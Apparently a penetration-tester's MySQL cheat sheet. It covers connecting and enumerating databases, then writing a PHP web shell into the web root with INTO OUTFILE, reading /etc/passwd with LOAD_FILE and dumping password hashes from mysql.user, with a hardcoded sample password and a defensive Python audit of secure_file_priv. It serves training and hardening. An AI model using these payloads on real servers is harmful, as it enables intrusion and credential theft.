#sql #mysql
#port `3306`
```shell
mysql -u root -h <IP address>
```
```cmd
mysql.exe -u username -pPassword123 -h 10.129.20.13
```
```mysql
SHOW DATABASES;
USE <database>;
SHOW TABLES;
SELECT * FROM <table>;
```
Command | Description
-|-
mysql -u \<user\> -p\<password\> -h \<IP address\> |Connect to the MySQL server. There must be no space between the `-p` flag and the password.
show databases; |Show all databases.
use \<database\>; |Select one of the existing databases.
show tables; |Show all available tables in the selected database.
show columns from \<table\>; |Show all columns in the selected table.
select * from \<table\>; |Show everything in the desired table.
select * from \<table\> where \<column\> = "\<string\>"; |Search for needed string in the desired

`MySQL` default system schemas/databases:
- `mysql` - is the system database that contains tables that store information required by the MySQL server
- `information_schema` - provides access to database metadata
- `performance_schema` - is a feature for monitoring MySQL Server execution at a low level
- `sys` - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
```mysql
SHOW DATABASES;
```
```mysql
SHOW TABLES;
```
```mysql
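-- MySQL form; the three-part name htbusers.INFORMATION_SCHEMA.TABLES is MSSQL (T-SQL) syntax
SELECT table_name FROM information_schema.tables WHERE table_schema = 'htbusers';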
```
```mysql
SELECT * FROM users;
```
*NOTE:* `sqlcmd` (the MSSQL command-line client) requires `GO` after the SQL statement before it executes; the `mysql` client only needs the terminating `;`.
## Execute Commands
`MySQL` does not have a stored procedure like `xp_cmdshell`, but we can achieve command execution if we write to a location in the file system that can execute our commands.
```mysql
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
```
These operations are permitted only to users who have the [FILE](https://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_file) privilege.
```mysql
show variables like "secure_file_priv";
```
`secure_file_priv` may be set as follows:
- If empty, the variable has no effect, which is not a secure setting.
- If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
- If set to NULL, the server disables import and export operations.
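The three `secure_file_priv` cases and the `FILE` privilege above, turned into a hardening check. This is an added example, not part of the original notes. The function names, the severity labels and the sample inputs are assumptions, and it assumes a directory that contains a web root is as exposed as one inside it.

```python
import posixpath

# Inputs are collected on the server being audited with:
#   SELECT @@secure_file_priv;
#   SELECT grantee FROM information_schema.user_privileges
#    WHERE privilege_type = 'FILE';

def classify_secure_file_priv(value):
    """Return which of the three documented cases a secure_file_priv value is."""
    if value is None:        # SQL NULL: import and export are disabled
        return "disabled"
    if value == "":          # empty: the variable has no effect
        return "unrestricted"
    return "restricted"      # a directory name

def _overlaps(a, b):
    """True if one path equals the other or contains it."""
    a, b = posixpath.normpath(a), posixpath.normpath(b)
    def inside(path, parent):
        return path == parent or path.startswith(parent.rstrip("/") + "/")
    return inside(a, b) or inside(b, a)

def audit_file_io(secure_file_priv, file_grantees, web_roots=("/var/www/html",)):
    """Return (severity, message) findings for file import/export exposure."""
    mode = classify_secure_file_priv(secure_file_priv)
    if mode == "disabled":
        return []            # FILE cannot be used for import/export at all
    findings = []
    if mode == "unrestricted":
        findings.append(("high", "secure_file_priv is empty: set it to NULL "
                                 "or to a dedicated directory"))
    else:
        for root in web_roots:
            if _overlaps(secure_file_priv, root):
                findings.append(("high", f"secure_file_priv {secure_file_priv} "
                                         f"overlaps web root {root}"))
    for grantee in sorted(file_grantees):
        findings.append(("review", f"{grantee} holds FILE; revoke unless required"))
    return findings

if __name__ == "__main__":
    # Constructed sample values, not taken from a real server.
    for value in (None, "", "/var/lib/mysql-files/", "/var/www/"):
        print(repr(value), audit_file_io(value, ["'webapp'@'%'"]))
```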
## MySQL - Read Local Files in MySQL
```mysql
select LOAD_FILE("/etc/passwd");
```
```mysql
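-- Lists accounts and password hashes; on MySQL 5.7.6+ the Password column is replaced by authentication_string
SELECT User, Host, Password FROM mysql.user;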
```